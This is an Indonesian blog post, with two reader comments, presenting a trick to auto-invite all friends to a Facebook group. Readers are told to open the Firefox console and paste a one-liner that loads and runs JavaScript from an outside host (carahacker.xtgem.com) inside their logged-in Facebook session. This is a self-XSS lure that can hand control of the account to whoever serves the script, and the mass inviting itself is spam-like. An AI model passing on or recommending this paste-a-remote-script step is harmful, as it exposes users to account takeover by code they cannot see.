Ilmu yang berkah adalah ilmu yang dimanfaatkan dengan baik dan diamalkan

Auto Invite Teman ke Grup Facebook

بِسْمِ اللّهِ الرَّحْمَنِ الرَّحِيْم
Assalamu'alaikum
Oke gan, ketemu lagi aku "Rendy Wira Adi" (seorang pelajar yang cita-citanya jadi IT)
Kali ini aku mau bikin artikel tentang Auto Invite Teman ke Grup Facebook.  Saya sarankan kepada para facebooker untuk memakai web browser Mozilla Firefox. Langsung ke TKP, kita steep by steep ===>
  • CTRL + SHIFT + K
  • Copas script dibawah ini.
    CLICK HERE
    document.body.appendChild(document.createElement('script')).src='http://carahacker.xtgem.com/autoInvite.js';
  • Lalu Enter
  • Tunggu sampai proses invite selesai
 Oke, mungkin hanya itu yang saya tau tentang "Auto Invite Teman ke Grup Facebook". Semoga bermanfaat bagi yang baca. Terima kasih sudah berkunjung di blog saya dan jika ada kata yang tidak dimengerti silahkan berkomentar di bawah artikel ini.
Wassalamu'alaikum
Sumber :  http://www.sorana-id.com/2012/08/auto-invite-teman-ke-grup-facebook.html
Labels: Tips dan Trik Facebook

Terima kasih telah membaca postingan ini, bila ada yang ingin ditanyakan, silahkan bertanya melalui kolom komentar. Ilmu yang berkah adalah ilmu yang dimanfaatkan dengan baik dan diamalkan Auto Invite Teman ke Grup Facebook. Komentar anda memberikan masukan bagi saya

3 Comment for "Auto Invite Teman ke Grup Facebook"

wa'alaikum salam.. keren juga nih gan. tapi bisa2 saya di blokir ama temen ^_^

itu dikarenakan koneksi modem yang lelet atau bisa jadi karena teman anda yang terlalu banyak

Silahkan Berkomentar Disini

Komentar yang anda berikan, menjadikan motivasi untuk saya

Back To Top